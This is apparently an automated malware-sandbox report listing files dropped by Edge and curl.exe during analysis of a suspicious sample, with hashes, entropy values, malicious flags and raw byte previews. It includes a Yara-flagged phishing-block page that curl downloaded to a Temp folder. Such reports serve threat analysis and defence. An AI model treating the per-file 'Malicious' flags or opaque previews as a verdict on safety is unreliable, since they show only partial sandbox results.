                                                                                                                                                                                                                                                            MD5:A2C02BDC5C337CDAE04E5C53DC3F3B91
                                                                                                                                                                                                                                                            SHA1:5FF56CE9A2B671693947F7A210636367F698A781
                                                                                                                                                                                                                                                            SHA-256:367B7B1BBCADB1562C37558BDF6464CEB990D5811620321D71D8AB926337C97A
                                                                                                                                                                                                                                                            SHA-512:7E41F65356D38B01884892A5256146331BE9D9BFB3E18553DB292D6C4C07FF76C08D5D49A3E73E65B463CF50DED70A298D5759A468824E17197306DC38F48650
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:...........W.H.8.....q..v.y...1..o.fm..ds..n@.#y%9...._U.%.d...s.{.N..Q].]]]U]]].:.."..q.......6(I.OB..w/_.i.lVY.....jB....X.....}.IN..G..=.qNn...]:.h......vv'a.'... .{7l}...... ...MN...H$.._...~.d...W.w.5...*oTB...r...._...o...0>8...'.ak...../..v..Ds{..u.......I.-{...Ion..L5....~M.[.5........7..../...3....w.^k...U~..5..#.N.=n......5...;.K^sg.0D....'...!..u.e..kns.%9....?..Y.U6.....B.s.:;.*oH..pv...n#R..A....i..U.n..F....?..m..D..F*..r[.f.#.../...v.;...`.k}..m.|U..|........`|.;U...M:...t..l......v..|PFGg'..V.x....$!.f.l.j......%..j.0.j|O..x0.v.....W/W.k.zEZ............7.}8><;>...:.....*j.b.m....._.g.0.._.f.5_7X..Qk.Iu..v6..z..`@....u..k.~.$1.)..&3w.\./..}E&.k2..KH_@...!...]@...:..A.d...1?......{..a....:m$.....k..'@=C`w...H.....h.m...kw....#....Y.s..;.t..6..{....C\V0=g2y[........t...^..V.?n.@l.....>4.C.T..Z_.!....v..8 ...4. .Q.x......?h.`..a..`....md._:..U.....w.w!|..J6.~....&.....:..v.}....n..3B&vz68=. ...v.9.R.....k....K.\..%;..o...
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41924
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):76314
                                                                                                                                                                                                                                                            Entropy (8bit):7.996159328201069
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/CFZ2cHkObTysAGz88:GdS8scZNzFrMa4M+labb1TqeZ
                                                                                                                                                                                                                                                            MD5:A4C1A16984D4A1F4D15F6A9075FE4ABD
                                                                                                                                                                                                                                                            SHA1:15E87677062BF7F7B7E67381FC2E84D460F28F6F
                                                                                                                                                                                                                                                            SHA-256:254A9865F8224E75BA2122569902D21BB2D612E501589842B35C334B8DA28187
                                                                                                                                                                                                                                                            SHA-512:6BFDF4BEFE6BB68184683D7E90994848D262D7C18BB4D74BF024BF99035511A1F3564BE49E8E6DF934CC4E6F33216FA1A8B2E613B9F5900B51A8AB68B6C754FE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (394)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4563
                                                                                                                                                                                                                                                            Entropy (8bit):5.038738653480832
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:1j9jwIjYjUDK/D5DMF+BOiUAtc3ZLmmLrR89PaQxJbGD:1j9jhjYjIK/Vo+trc3Z6mLre9ieJGD
                                                                                                                                                                                                                                                            MD5:2D55A0DD79D9D6B7CFE3610C5ADE5266
                                                                                                                                                                                                                                                            SHA1:3F80999C30F814242A72CEABB1E99D568C920F59
                                                                                                                                                                                                                                                            SHA-256:D2B229CD9E1848FF187B9D19EF14A14840AC9916F05C4DECDF019E7FA081A805
                                                                                                                                                                                                                                                            SHA-512:243AEA68461163E3C2C966CBD7A8517E8AEF191085C7DD21F7FA849A6C7F770F3FA231D73513915A5622D9DCE6403ACCD6183F909B13C92DF7469344B2E77763
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlockedWebSite, Description: Yara detected BlockedWebSite, Source: C:\Users\user\AppData\Local\Temp\bosfortuy.ms, Author: Joe Security
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]-->.<style>body{margin:0;padding:0}</style>... [if gte IE 10]> >.<script>. if (!navigator.cookieEnabled) {. window.addEventListener('DOMContentLoaded
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):11185
                                                                                                                                                                                                                                                            Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                            MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                            SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                            SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                            SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):7328
                                                                                                                                                                                                                                                            Entropy (8bit):5.860441824879722
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:RhZIpt7VgtFD3F8CMXuuzaRFJrb7ghNglFjPu3ljl7arVSQi6E/swokYglZ:Ryt7VgtFD3FaeTrgCtP0dyCDsoYgn
                                                                                                                                                                                                                                                            MD5:117D173E82B282DECA740475E35C8ECD
                                                                                                                                                                                                                                                            SHA1:912B12B993507EBD9AF6BDC937559B4D4B58A0D8
                                                                                                                                                                                                                                                            SHA-256:65491B21947D60C87C6358DCF69DF9ACA2B99E8F3B611BD3D559699BBC25000B
                                                                                                                                                                                                                                                            SHA-512:E455C0BB68E9056C6242058FCBA954BC1D5EA4A864E99BE008B2745C51209B477BD7BDBA57006BE4A02A09BDA49C0CDC17E8F870C81C7771864640950F5F9A93
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJoeXBoLWFmLmh5YiIsInJvb3RfaGFzaCI6ImU3S1ZpWjlhODYwT3ZfdHR1dTRDME9JODlGQUNkcjR0Z01lOGhnNU1xVUkifSx7InBhdGgiOiJoeXBoLWFzLmh5YiIsInJvb3RfaGFzaCI6InduaE9NeFdLZ0hFMWhROXhKYWZxcS1SeXM4X0hyN2dzZFBBdHBwNmlVUDQifSx7InBhdGgiOiJoeXBoLWJlLmh5YiIsInJvb3RfaGFzaCI6IlpLdnllRTdIQmlLMktnYjBwRUUzVnotRmZ4RlJoQVNQcUJHeXlCbGtkaDAifSx7InBhdGgiOiJoeXBoLWJnLmh5YiIsInJvb3RfaGFzaCI6ImRaUHdPVkNCNC02eTJGRnRFSFJtQ0tfWUpzXzlUbjQzMVRrMm1UMGdDaE0ifSx7InBhdGgiOiJoeXBoLWJuLmh5YiIsInJvb3RfaGFzaCI6InduaE9NeFdLZ0hFMWhROXhKYWZxcS1SeXM4X0hyN2dzZFBBdHBwNmlVUDQifSx7InBhdGgiOiJoeXBoLWNzLmh5YiIsInJvb3RfaGFzaCI6IklnUndJWmZEOFctRjdYbExMMHJ4TTdkYTVRc3FVQlVwS2F5SkdodlVfRXcifSx7InBhdGgiOiJoeXBoLWN1Lmh5YiIsInJvb3RfaGFzaCI6ImFiWlhPbWx5T0dnSEplVWlHMkhaQURadHA3dlM2QnI3RGh3TUF0eWV4N2sifSx7InBhdGgiOiJoeXBoLWN5Lmh5YiIsInJvb3RfaGFzaCI6Ims5Y1JTUUhCNDNiNlVNaHN6cE5nN3k2cGliTVZGOFJnQjk
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):72640
                                                                                                                                                                                                                                                            Entropy (8bit):5.813503646473953
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:dH4Yzf/r1T2bhKC+wQ/MJ4tpBMfWDMxFaye3yrGZ3vGV9YODhX3yKfhGt:dxLr1qFKpNpufWIqye3KgGVnDxe
                                                                                                                                                                                                                                                            MD5:FFA9DB945F0F0C15B8BBA75A6E064880
                                                                                                                                                                                                                                                            SHA1:49217A9D5BB7A868464403B4E3C82E80DF53456C
                                                                                                                                                                                                                                                            SHA-256:5487EE44A4CD706D0086522E90C59C76CDF2AC68CE506FD3EAE6054B9220C0CF
                                                                                                                                                                                                                                                            SHA-512:CC67B2DFBBB009DD3FDB999FE86410425455613C12DAC755A3CDED435CD25CA4363782D70F3B7BB7C0FDD63E2EB649AE6A4053D929F463B646B43D7DBFDA79C0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b........L...............K....8...h............... ...(...0...8...@...H...P...X...`...h...p...x........................................................... ...(...0...8...@...H...P...X...`...h...p...x............................................... ...@.. P..!X.."p..#x..$...%...&...'.... ...@.. P..!X.."p..#x..$...%...&...'...........?................C............ ... ...@.E...."`..'...-@.I6...=...C`..J...P...V..O]...e .Qm`..t..S| ...@...`.......@........Z..... ...`...`.......... `......A.....$...e.......g..... ...@...@.G..... .I. ....K..... ...............................U...........XA..Y..... ......! ..4@.............K...K*..U.f......i...c........ ..5"../...3............`.EO........ .....I...J.A..3......./........a.......a..........;B.U%...+A.W0...2...Q ..\...........9 ..........f.......7C......5a.H.@.GD...8...........a..L<!.M........>a.U....!..RB.......f..........C...E...C .Z............M....b.D7. .........a.H!..OSA...A.KJ...".."..N.......R.`...A.R^...........JB.........'`.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):703
                                                                                                                                                                                                                                                            Entropy (8bit):4.3052979773855045
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:A1/6kZQ0FLwE792NGl5D/0l3gebslEVkGsOoiEbM0TbvZE8h:QnFR0NGlN/0l3g8qfOMbNTbZE8h
                                                                                                                                                                                                                                                            MD5:8961FDD3DB036DD43002659A4E4A7365
                                                                                                                                                                                                                                                            SHA1:7B2FA321D50D5417E6C8D48145E86D15B7FF8321
                                                                                                                                                                                                                                                            SHA-256:C2784E33158A807135850F7125A7EAABE472B3CFC7AFB82C74F02DA69EA250FE
                                                                                                                                                                                                                                                            SHA-512:531ECEC11D296A1AB3FAEB2C7AC619DA9D80C1054A2CCEE8A5A0CD996346FEA2A2FEE159AC5A8D79B46A764A2AA8E542D6A79D86B3D7DDA461E41B19C9BEBE92
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b........@...............H.....L...L...L..(L..0L..8L..@L..HL..PL..XL..`L..xL...L...L...L...L...L...L...L...L...L...L...L...L...L...L...M...M...M...M.. M. (M.!0M."8M.#@M.$PM.%XM.&`M.'hM.(pM.)xM.*.M.+.M.,.M.-.M...M./.M.0.M.1.M.2.M.3.M.4.N.5.N.6.N.7.N.8 N.98N.:@N.;XN.<`N.=hN.>pN.?.N.@.N.A.N.B.N.C.O.D.O.E.O.F.O.G`..Hh...............?......N........@...............A.......................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...................................................................@...A...B...................G...................................(......................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6098
                                                                                                                                                                                                                                                            Entropy (8bit):3.681934272069777
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:mmfvnESaDPq1iYM7N8gyurprJr/P5FwBlh/RT95vtEUnbpwROaQPP/KV2L+HCdYV:XfYPq1iYyNk5p50OwQPP/KV2L+HCinCO
                                                                                                                                                                                                                                                            MD5:087DE134F3B23A9944AFD711A9667A0B
                                                                                                                                                                                                                                                            SHA1:1B67D0A65EF91295207D66E62B682803AA74EF00
                                                                                                                                                                                                                                                            SHA-256:25B7CFA039F82AC92990E1789DE40988D490DB9B613852FB24036B38FF87893C
                                                                                                                                                                                                                                                            SHA-512:42C0B51E0E28109A7058D3FC03FA7BEF8B25C9B3C8BB74933574FAD06C061FD1636B53EEEACF652E438D4DF08002DB449681BE9E6E6821EC23D32A8BE1778998
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b........4...(...........E....8...h..!. ."0 .#p ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ...!...!...!...!.. !..(!..0!..8!..@!..X!..`!..h!..p!. x!...!...!...!...!...!...!...!...!...!...!...!...!...!...!...!..."..."..."...".. "..("..0"..8"..@"..X"..`"..h"..p". x".!.".".".#.".$.$.$.$.........?...............w...@........................!...+...3.... ..;..KD&.. ..ML4.NT8.O\6..e....$..m...v2..~<..,..."..:..0..*..(........S2.......... ...!...".... ......".........................................................S............$..............Z............9.......................$.......".........................................................S............$..............Z............O.......................$..........A...B........P..E[..FK..GK..HK......JK..KK......MK...c..OK..PK...X..RK..SK...2..UK..H:..WK..XK..YK..ZK..[K.......V..MX..........A...B.......dK..EK..F[..GK..HK..E0..JK..KK..H*..MK..NK..OK..PK......RK..SK..TK..UK..K0..WK..XK..YK..ZK..[K..S^...V...]..T0..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3467
                                                                                                                                                                                                                                                            Entropy (8bit):2.7535319237657605
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:Op0nEURURUxURURU/ajyRUK0x0x0x0xGURURURURURUMO+L:y08D8+L
                                                                                                                                                                                                                                                            MD5:E8A4F8F5238F9A0FF6968AD8DBA2755F
                                                                                                                                                                                                                                                            SHA1:ABF002FF28B3AA2A59948225E5E600096348CAA7
                                                                                                                                                                                                                                                            SHA-256:7593F0395081E3EEB2D8516D10746608AFD826CFFD4E7E37D53936993D200A13
                                                                                                                                                                                                                                                            SHA-512:B54811E1BE6E63BF19E408AC4AE9DA86E1473E4E8F1E9D517D907E025BE20FA6979517339EC6DEFD0EC30613ED42A97D88111D39297214AFA7606597CBA5EA86
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b........d...H...............P.......................................................................................3........U......c...$..............h....U..*.... ...$..m(...,...U.../...3..r7..3;...U...>...B..wF..8....M...Q...U..|U.......U..#....U.......U..g...h...$T..ET...V..H....U...U..sV...V.......Y..rV..sV..PT......RU...U..Y.......b...C...D...E.......G...H.......J...K...L...M...N.......P...Q...R...S.......U...V...W...X...Y...Z......................B...c...D...E.......G...H.......J...K...L...M...N.......P...Q...R...S.......U...V...W...X...Y...Z......................B...C...d...E.......G...H.......J...K...L...M...N.......P...Q...R...S.......U...V...W...X...Y...Z......................B...C...D...e.......'...H.......J...K...L...M...N.......P...Q...R...S.......U...V...W...X...Y...Z......................B...C...D...E.......g...H.......J...K...L...M...N.......P...Q...R...S.......U...V...W...X...Y...Z......................B...C...D...E.......G...h.......J...K...L...M...N.......
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):703
                                                                                                                                                                                                                                                            Entropy (8bit):4.3052979773855045
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:A1/6kZQ0FLwE792NGl5D/0l3gebslEVkGsOoiEbM0TbvZE8h:QnFR0NGlN/0l3g8qfOMbNTbZE8h
                                                                                                                                                                                                                                                            MD5:8961FDD3DB036DD43002659A4E4A7365
                                                                                                                                                                                                                                                            SHA1:7B2FA321D50D5417E6C8D48145E86D15B7FF8321
                                                                                                                                                                                                                                                            SHA-256:C2784E33158A807135850F7125A7EAABE472B3CFC7AFB82C74F02DA69EA250FE
                                                                                                                                                                                                                                                            SHA-512:531ECEC11D296A1AB3FAEB2C7AC619DA9D80C1054A2CCEE8A5A0CD996346FEA2A2FEE159AC5A8D79B46A764A2AA8E542D6A79D86B3D7DDA461E41B19C9BEBE92
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b........@...............H.....L...L...L..(L..0L..8L..@L..HL..PL..XL..`L..xL...L...L...L...L...L...L...L...L...L...L...L...L...L...L...M...M...M...M.. M. (M.!0M."8M.#@M.$PM.%XM.&`M.'hM.(pM.)xM.*.M.+.M.,.M.-.M...M./.M.0.M.1.M.2.M.3.M.4.N.5.N.6.N.7.N.8 N.98N.:@N.;XN.<`N.=hN.>pN.?.N.@.N.A.N.B.N.C.O.D.O.E.O.F.O.G`..Hh...............?......N........@...............A.......................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...................................................................@...A...B...................G...................................(......................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):64245
                                                                                                                                                                                                                                                            Entropy (8bit):5.814241893442265
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:sonSvAX9Cf306OFe4Q/irU+bvWDdF3EeFWPA:rSvEchf41oKv4dBEbY
                                                                                                                                                                                                                                                            MD5:E8B1509F86508E807D61216614B3DD58
                                                                                                                                                                                                                                                            SHA1:B2334509E9D1589AD2E8B80C187018EADB15872B
                                                                                                                                                                                                                                                            SHA-256:97A4755FE9E653A08969F1933E3DB19C712078B227BD5AA6799093ABC5A0EDC3
                                                                                                                                                                                                                                                            SHA-512:FB340FEF9D0DBA342FD85B8B18C0090391AED717FE92A8DA7C5D939DC9C0AA5235D4423B590E52B0DECDDD4F4AD8BD4652361161C193617601FF490DD1BE97FE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b........................i....8...h............... ...(...0...8...@...H...P...X...`...h...p...x..................!...#...&...'...(...)...+................ ...(...0...8...@...H...P...X...`...h...p...x..................!...#...&...'...(...)...+.......- ../@...H...P..0X...h..1p..2x......4...3...$...5...6...*.......- ../@...H...P..0X...h..1p..2x......4...3...$...5...6...*....`...h...p...x...........8...@.......... ... ..." .."(..%p..%x..,...,...........?...............q=........p...p.C.....P..(...$...-.......2.......;......(...G...Q...W...`.... .S....l...up...........Y.....1.......`.....U.......].`.!.....q..........>..fd..'.....i....Cq..D...5..m.0.n.`... .0....O..r P.........u...6......]......gp..........1..K.`.U..............P$P..<..._R.....T...........W...."B.....a.......Y.!.].q.\<B...a.]...!........+@..&......f...'.a.h...i.......k,0.)n...D..T....#...'C......W..D...........G. ..bR..%........0.!.0._R...*...0......QTp..t+.+...T5...;...@...C......Y.`... .[G.......L.... ..Qq.....
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):52842
                                                                                                                                                                                                                                                            Entropy (8bit):5.38329333122688
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:a5OMYzUXoeoZA7SmEUbxucj5DTKZ2oVXEyb:a5JYzUXoeCA7SmEU9ucjBKZxJEyb
                                                                                                                                                                                                                                                            MD5:B4E5921B1DF85BA9F2EBE6CE578915F6
                                                                                                                                                                                                                                                            SHA1:B5F2E813667AAE32E65CAB9C9A0DD291421ADA0B
                                                                                                                                                                                                                                                            SHA-256:2BAEE19D5024FF87DCF3A1B9D0DA1B3AC5A1E506ADEEAD3B96A4DE5395D0290E
                                                                                                                                                                                                                                                            SHA-512:41696A9E25CA004ACDC8DEF265766392CE3568747560FF73CD08AC9FA4A99E4C4654FB84DC602845B3E444A8312FB099C72932471F7E830874CD7CFA184B63B7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b............4...j....................0...8...@...x..........(. .). .* .+( .,0 .-8 ..h ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ...!...!...!...!.. !..(!..0!. 8!.!@!."H!.#P!.$X!.%`!.&h!.'p!...!...!...!...!...!...!...!...!...!...!...!...!...!...!...!...!..."..."..."...".. "..("..0". 8".!@"."H".#P".$X".%`".&h".'p".(.".).".*.".+.".,.".-."..."./.#./.#.0.#.0.#.10#.18#.2p#.2x#.3.#.3.#.4.#.4.#.5.#.5.#.6.#.6.#.7.#.7.#.8.#.8.#.9.#.9.#.:.#.:.#.;.$.<0$.=8$.>.&.>.&.? '.?('.@0'.@8'.A`'.Ah'.B.'.B.'.C.'.C.'.D...E0..F.o.G.o.H.o.I.o.J o.K(o.L0o.M8o.N@o.OHo.PPo.QXo.R`o.Sho.Tpo.Uxo.V.o.W.o.X.o.Y.o.Z.o.[.o.\.o.].o.^.o._.o.`.o.a.o.b.o.c.o.d.o.e.o.fxq.gP2.gX2.h`2.hh2.i.2.i.2.j.3.k.3.l.3.m.3.n.3.o.3.p.3.q.3.r.3.s.3.t.3.u.3.v0..wp..xx.......................2...8...U...h...........B........ ..................A..:...i........a..........H..._b..}b..."..."......"...BC..Z.......q...$....C...c.!.....C.#D`.$.c.%U..&..'-..(S..)S..*g$.+L..,...-.D..[....d...E..L...QA.3e .4...5.e.....7...8...
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):35913
                                                                                                                                                                                                                                                            Entropy (8bit):5.348760037769152
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:s022NAK9/8ei2v0BJlYZqNCII2vfP+DzEKd8mPBFDpvH5aWg6:c25X/MBPjNCIISkTPB3RN
                                                                                                                                                                                                                                                            MD5:B0F32ED7B4B8A068A962D820627B7229
                                                                                                                                                                                                                                                            SHA1:76734E58BD33C4D1450228BF05E53CFE169A02E6
                                                                                                                                                                                                                                                            SHA-256:4D0569FE2F4B41B3164CF610310E1D996FD2C553CC39DE6062E50F4E033CC207
                                                                                                                                                                                                                                                            SHA-512:8F20253985C217401627E0C7D31AA1BF213FA220BB498869E11E1E532C3C82DBC2ABE6FFA27C69243913243AF1AEB35806175511D77D730C914B1CADD71AA7A0
                                                                                                                                                                                                                                                            Malicious:false
